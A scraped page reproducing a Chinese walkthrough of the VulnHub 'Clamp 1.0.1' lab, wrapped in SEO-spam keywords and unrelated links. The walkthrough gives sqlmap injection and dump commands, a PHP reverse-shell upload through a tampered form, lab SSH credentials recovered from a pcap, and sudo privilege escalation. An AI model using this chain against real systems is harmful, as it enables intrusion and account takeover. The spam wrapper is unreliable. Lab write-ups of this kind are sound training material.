当前位置: 首页 > news >正文

一级a做受片免费网站阿勒泰网站建设

一级a做受片免费网站,阿勒泰网站建设,礼品兑换网站怎么做,公司企业邮箱如何申请一、靶机下载地址 https://www.vulnhub.com/entry/clamp-101,320/ 二、信息收集 1、主机发现 # 使用命令 nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:88:B4:BF" 2、端口扫描 # 使用命令 nmap 192.168.145.0/24 -p- -sV 3、指纹识别 # 使用命令 whatweb …

一、靶机下载地址

https://www.vulnhub.com/entry/clamp-101,320/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:88:B4:BF"

2、端口扫描

# 使用命令
nmap 192.168.145.0/24 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.206

4、目录扫描

# 使用命令
dirb http://192.168.145.206

三、获取shell

1、访问靶机IP地址

2、拼接并访问 /nt4stopc/,发现下面有一些问题,提示必须收集答案

3、都是一些判断题,对与错对应1与0,最后结果为0110111001,拼接访问

4、点击图中位置,发现存在参数,php语言,尝试注入,and 1=1 --+ 显示正常,and 1=2--+ 显示异常,表名存在SQL注入

5、使用sqlmap工具进行检测

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch

6、获取库名

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

7、获取tatil库下的表名

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables

8、获取gereksiz字段下的数据


# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --columns --dump

9、解码后如下结果,可能还是路径,拼接访问

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

10、再拼接 upload.php,发现文件上传的功能

11、但是没有提交按钮,自己在前端给加一个

12、kali 生成反弹 shell

# 使用命令
locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php

13、上传该文件后,返回了文件路径,文件名为md5加密后的

14、拼接访问文件,成功反弹shell

四、提权

1、使用 python 提升交互性

# 使用命令
python3 -c 'import pty;pty.spawn("/bin/bash")'

2、在 /var/www/html 下发现 important.pcapng文件

3、查看文件,发现内容

4、url解码,得到以下数据,账号密码为mkelepce:mklpc-osas112.

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

5、使用ssh连接,连接成功

# 使用命令
ssh mkelepce@192.168.145.206

6、查看当前权限

# 使用命令
sudo -l
mklpc-osas112.

7、执行sudo su命令提权成功

http://www.yayakq.cn/news/462118/

相关文章:

  • 北京微信网站设计报价网站开发记入什么会计科目
  • 北京有做网站的吗安阳seo关键词优化
  • 海口会计报名网站html好看的网站的代码
  • 宁波网站优化如何网站长尾词排名做不上去
  • 网站建设汇报方案ppt网站建设做什么费用
  • 像淘宝购物网站建设需要哪些专业人员?营销网站建设内容
  • 赶集门户网站建设方案正规网站制作价格
  • 网站主页排版成都设计公司尹超简历
  • 一个做网站的软件做哪些网站比较赚钱
  • 云龙网站开发百度关键词排名推广工具
  • 免费微信建站有哪些网站python做网站用什么
  • php按步骤做网站网页制作培训多少钱
  • 慈溪网站建设哪家好非营利组织网站建设会计分录
  • 369网站建设中心江苏网站备案
  • 网站开发 ssh 菜鸟太原网站制作
  • 010网站建设四川建设网入川备案网站
  • aspx网站实例宁波外客网络科技有限公司
  • wordpress 调用站外api个人制作个网站
  • c 做特产网站seo搜索优化软件
  • 中山营销型网站建设wordpress俄语版
  • 微博营销网站网站开发运行环境论文
  • 做相片网站WordPress邮件代发
  • 淮北做网站公司做网站网站代理
  • 宝丰县精神文明建设的门户网站东莞互联网大公司
  • 企业网站有哪些企业网站建设竞标需要怎么做
  • 最低网网站多少钱我的长沙app
  • 怎么为网站网页注册免费网址网站开发总监
  • 自己做的网站怎么传入外网拼多多网站开发
  • 为你做的网站网络舆情监测制度
  • 学校网站系统破解版wordpress 扫码插件